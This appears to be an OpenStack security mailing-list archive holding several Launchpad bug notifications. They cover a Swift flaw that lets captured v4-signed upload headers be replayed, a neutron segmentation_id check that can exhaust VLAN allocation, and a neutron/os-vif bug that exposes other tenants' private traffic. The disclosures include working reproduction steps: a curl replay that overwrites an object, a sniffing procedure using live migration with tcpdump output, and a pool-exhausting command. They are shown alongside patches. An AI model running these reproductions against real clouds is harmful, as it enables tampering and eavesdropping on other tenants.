'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 
's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 
Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1840895 at bugs.launchpad.net Tue Oct 22 19:44:35 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 22 Oct 2019 19:44:35 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 14.0.3 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <157177347589.25827.18089062393175634564.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 14.0.3 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Oct 22 19:52:48 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 22 Oct 2019 19:52:48 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 13.0.5 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <157177396840.25749.16342850210283219877.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 13.0.5 release. 
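For readers following the fix, the check the bug description asks for is essentially a range guard on the requested VLAN tag. A minimal sketch of that idea follows; the function name and constants are illustrative assumptions, not the code actually merged into neutron:

    # Illustrative sketch, not the merged neutron change: reject a
    # provider:segmentation_id of 0 (or anything outside 1-4094) up front,
    # instead of letting it poison the ml2_vlan_allocations table.
    MIN_VLAN_TAG = 1
    MAX_VLAN_TAG = 4094

    def validate_vlan_segmentation_id(segmentation_id):
        if segmentation_id is None:
            # tenant networks may omit it; a free tag is picked from the pool
            return
        if not MIN_VLAN_TAG <= segmentation_id <= MAX_VLAN_TAG:
            raise ValueError(
                "provider:segmentation_id %s is outside the usable VLAN "
                "range %s-%s" % (segmentation_id, MIN_VLAN_TAG, MAX_VLAN_TAG))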
-- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1840895 at bugs.launchpad.net Tue Oct 22 19:56:09 2019 From: 1840895 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 22 Oct 2019 19:56:09 -0000 Subject: [Openstack-security] [Bug 1840895] Fix included in openstack/neutron 12.1.1 References: <156637398395.26490.15997468179982387146.malonedeb@gac.canonical.com> Message-ID: <157177416913.25877.12491358623245818860.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/neutron 12.1.1 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840895 Title: segment parameter check failed when creating network Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: neutron net-create test --provider:network_type vlan --provider:segmentation_id 0 Execute commands like this, all vlan in ml2_vlan_allocations table is set to allocated, no vlan network can be created. validate_provider_segment function should check whether provider:segmentation_id is 0. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1840895/+subscriptions From 1734320 at bugs.launchpad.net Wed Oct 23 01:39:09 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 23 Oct 2019 01:39:09 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157179474952.25660.12811952856042056411.malone@chaenomeles.canonical.com> Reviewed: https://review.opendev.org/686347 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=797a379c51a05fca356d2f2575bfc386b0287afd Submitter: Zuul Branch: stable/pike commit 797a379c51a05fca356d2f2575bfc386b0287afd Author: Sean Mooney Date: Thu Nov 8 16:07:55 2018 +0000 raise priority of dead vlan drop - This change adds a max priority flow to drop all traffic that is associated with the DEAD VLAN 4095. - This change is part of a partial mitigation of bug 1734320. Without this change vlan 4095 traffic will be dropped via a low priority flow after being processed by part/all of the openflow pipeline. By raising the priorty and droping in table 0 we drop invalid packets as soon as they enter the pipeline. Conflicts: neutron/tests/unit/plugins/ml2/drivers/openvswitch/agent/openflow/native/test_br_int.py Change-Id: I3482c7c4f00942828cc9396cd2f3d646c9e8c9d1 Partial-Bug: #1734320 (cherry picked from commit e3dc447b908f57e9acc0378111b8e09cbd88ddc5) ** Tags added: in-stable-pike -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
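For context on the change reviewed above, the mitigation amounts to one highest-priority drop flow in table 0 matching the dead VLAN. A rough sketch, assuming a neutron-style bridge helper (the names and exact flow syntax here are assumptions, not the merged code):

    # Rough illustration of the commit above: drop anything tagged with the
    # dead VLAN (4095) at maximum priority in table 0, before the rest of the
    # OpenFlow pipeline ever sees it. Conceptually the same as:
    #   ovs-ofctl add-flow br-int "table=0,priority=65535,dl_vlan=4095,actions=drop"
    DEAD_VLAN_TAG = 4095
    MAX_PRIORITY = 65535

    def install_dead_vlan_drop(int_br):
        # int_br is assumed to expose an add_flow() helper; the real change
        # goes through the agent's bridge abstraction instead.
        int_br.add_flow(table=0, priority=MAX_PRIORITY,
                        dl_vlan=DEAD_VLAN_TAG, actions='drop')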
https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. 
Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. 
Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 
'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1765834 at bugs.launchpad.net Wed Oct 23 17:44:40 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 23 Oct 2019 17:44:40 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <157185268007.3372.15233325323446834643.malone@gac.canonical.com> Reviewed: https://review.opendev.org/689883 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=423f96293b6eb43504b5370e893c280697ed23c9 Submitter: Zuul Branch: stable/rocky commit 423f96293b6eb43504b5370e893c280697ed23c9 Author: Tim Burke Date: Tue Dec 11 15:29:35 2018 -0800 Verify client input for v4 signatures This is a combination of 2 commits. ========== Previously, we would use the X-Amz-Content-SHA256 value when calculating signatures, but wouldn't actually check the content that was sent. This would allow a malicious third party that managed to capture the headers for an object upload to overwrite that with arbitrary content provided they could do so within the 5-minute clock-skew window. Now, we wrap the wsgi.input that's sent on to the proxy-server app to hash content as it's read and raise an error if there's a mismatch. Note that clients using presigned-urls to upload have no defense against a similar replay attack. Notwithstanding the above security consideration, this *also* provides better assurances that the client's payload was received correctly. 
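To make that mechanism concrete, here is a minimal sketch of the approach described in the commit message, assuming a WSGI file-like body and the hex digest taken from the signed X-Amz-Content-SHA256 header; it illustrates the idea rather than the code merged into swift:

    # Sketch only: hash the request body as it is read and reject it if the
    # digest does not match the signed X-Amz-Content-SHA256 value.
    # UNSIGNED-PAYLOAD (pre-signed URLs, some clients) skips the comparison.
    import hashlib

    class SHA256CheckingInput(object):
        def __init__(self, wsgi_input, expected_sha256):
            self._input = wsgi_input
            self._expected = expected_sha256
            self._hasher = hashlib.sha256()
            self._checked = False

        def read(self, *args):
            chunk = self._input.read(*args)
            self._hasher.update(chunk)
            if not args or not chunk:
                # whole body consumed (read() with no size, or EOF reached)
                self._verify()
            return chunk

        def _verify(self):
            if self._checked or self._expected == 'UNSIGNED-PAYLOAD':
                return
            self._checked = True
            if self._hasher.hexdigest() != self._expected.lower():
                # s3api would turn this into an S3-style error response
                raise ValueError('request body does not match X-Amz-Content-SHA256')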
Note that this *does not* attempt to send an etag in footers, however, so the proxy-to-object-server connection is not guarded against bit-flips. In the future, Swift will hopefully grow a way to perform SHA256 verification on the object-server. This would offer two main benefits: - End-to-end message integrity checking. - Move CPU load of calculating the hash from the proxy (which is somewhat CPU-bound) to the object-server (which tends to have CPU to spare). Closes-Bug: 1765834 (cherry picked from commit 3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634) ---------- s3api: Allow clients to upload with UNSIGNED-PAYLOAD (Some versions of?) awscli/boto3 will do v4 signatures but send a Content-MD5 for end-to-end validation. Since a X-Amz-Content-SHA256 is still required to calculate signatures, it uses UNSIGNED-PAYLOAD similar to how signatures work for pre-signed URLs. Look for UNSIGNED-PAYLOAD and skip SHA256 validation if set. (cherry picked from commit 82e446a8a0c0fd6a81f06717b76ed3d1be26a281) (cherry picked from commit 6ed165cf3f65329beaef9977a5fec24ce3ac0b39) ========== Change-Id: I61eb12455c37376be4d739eee55a5f439216f0e9 ** Tags added: in-stable-rocky -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... 
